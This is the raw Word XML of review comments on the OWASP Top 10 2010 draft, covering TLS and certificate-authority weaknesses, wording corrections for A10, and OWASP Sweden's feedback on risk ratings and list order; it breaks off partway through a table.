        <w:t xml:space="preserve">Consider the security guarantees that TLS aims to provide: Not just data confidentiality, but also server authentication and data integrity. Without authentication, confidentiality and integrity have no meaning (the client might be speaking “securely” to the attacker!). Authentication and integrity are (or should be) extremely important even for a public site that accepts anonymous clients, such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>www.nytimes.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>www.google.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve"> – do we want attackers to be able to falsify world news? Does Google want competing advertisers to hijack their excellent advertisement platform, adversely affecting their business? I have seen both exploits happen; the attack is trivial to mount on a local network, and script-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>kiddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve"> tools for achieving such attacks on an internet scale are widely available.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">To make matters worse, no browser has a correct user interface for transport security. A correct interface would express the risk of unsafe transport or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>misconfigured</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>mis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>-used secure transport. Even a security-conscious person who always browses to Wells Fargo by manually typing in “</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>https://www.wellsfargo.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>” (or who always uses a bookmark to that URL) can be tricked: What if the browser presents the person with a site whose identity was signed by a malicious or incompetent certificate authority (as in the “MD5 Considered Harmful Today” attack)?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">Consider </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>a  person</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve"> who is extremely suspicious, and checks to see which CA signed the server’s certificate. In the attached screenshots, Wells Fargo appears to be run by “(unknown)”, and is signed by VeriSign. That sure seems fishy to me, especially since Wells Fargo has its own root CA – wouldn’t they </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve"> the CA they went to all the trouble of getting built into the browser? We can’t be sure we’re talking to the real Wells Fargo, even after an extraordinary effort.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP should recognize this problem – </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve"> so few sites correctly use HTTPS, that no browser correctly reports to people the risk of using an unsafe transport layer, and that no browser implements CA-based server authentication safely – as the fundamental vulnerability it is.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>There is no way for a normal person to know for sure who they are talking to on the web. This is the number 1 vulnerability on the web today – not number 10.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRPr="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>Again, thank you for your work with the OWASP Top Ten. I know it will continue to be useful!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="009C2FFD" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidR="00620578">
        <w:t>Michael Coates</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:r>
        <w:t>Here are a few minor corrections for A10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Section: Am I Vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Current: #2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Only</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> strong algorithms are supported.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:r>
        <w:t xml:space="preserve">Corrected: #2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Only</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> strong </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ciphers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are supported.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Section: How Do I Prevent This?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Current: #3 Configure your SSL/TLS provider to only support strong (FIPS 140-2 compliant) algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Corrected: #3 Configure your SSL/TLS provider to only support strong (FIPS 140-2 compliant) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ciphers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Section: Threat Model, third box</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRPr="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Current: Detecting such flaws is easy. Just observe the site’s network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRPr="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>I’m not sure I completely agree here. It’s easy to detect if the data is encrypted versus not encrypted, but that’s only 1 check of many that is needed to determine if SSL</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TLS is done correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRPr="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Michael</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Sweden Chapter Comments (submitted by John </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wilander</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>OWASP Sweden's Feedback on Top 10 2010 rc1</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OWASP Sweden had a chapter meeting on Dec 2nd to discuss the release candidate for OWASP Top 10 2010. This is our joint feedback to the Top 10 project.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Overall</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Overall, the chapter thinks that </w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>the new, risk-based approach is very valuable</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and that the document has a higher potential of getting through to both developers (clear technical references) and executives with a technical understanding (risk-based and business oriented). Also, </w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>we really like the document format with one risk per page</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Splendid work!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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If OWASP wants to target a specific audience the document could be reworked with those people in mind. For instance putting more focus on business risk and cutting some technical details when targeting executives. Right now it's a "one size fits all".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OWASP Risk Rating Methodology</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 xml:space="preserve">The OWASP Risk Methodology seems simple to use and experts on risk analysis will </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>recognise</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the way it works. Three questions were raised though:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="792"/>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 xml:space="preserve">Isn't the Business risk needed for it to be a full risk calculation? Maybe that needs to be highlighted and a full explanation of how that part of the formula looks. Entering your own Business risks should ideally give you a new, adjusted top list. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="792"/>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 xml:space="preserve">Shouldn't a </w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>higher</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> number imply a </w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>higher</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> risk? At least that's what the Swedes are used to ;). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="792"/>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Maybe the Top 10 document should contain an example of how you actually calculate the risk? Page 20 seems like a good candidate. We mean the full formula "((2 + 1 + 1) / 3) * 2".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>List in Wrong Order?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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 xml:space="preserve">The order of the list seems wrong. If you calculate the risk ratings (assuming: high impact = 1, low impact = 3, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Detectability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unvalidated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Redirects and Forwards should be red, not yellow) you get the following list:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:after="72" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9275" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="dotted" w:sz="4" w:space="0" w:color="808080"/>
          <w:left w:val="dotted" w:sz="4" w:space="0" w:color="808080"/>
          <w:bottom w:val="dotted" w:sz="4" w:space="0" w:color="808080"/>
          <w:right w:val="dotted" w:sz="4" w:space="0" w:color="808080"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1895"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="1620"/>
        <w:gridCol w:w="1170"/>
        <w:gridCol w:w="1350"/>
      </w:tblGrid>
      <w:tr w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidTr="009C2FFD">
        <w:trPr>
          <w:trHeight w:val="168"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1895"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rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009C2FFD">
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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b/>
                <w:bCs/>
                <w:color w:val="000000"/>
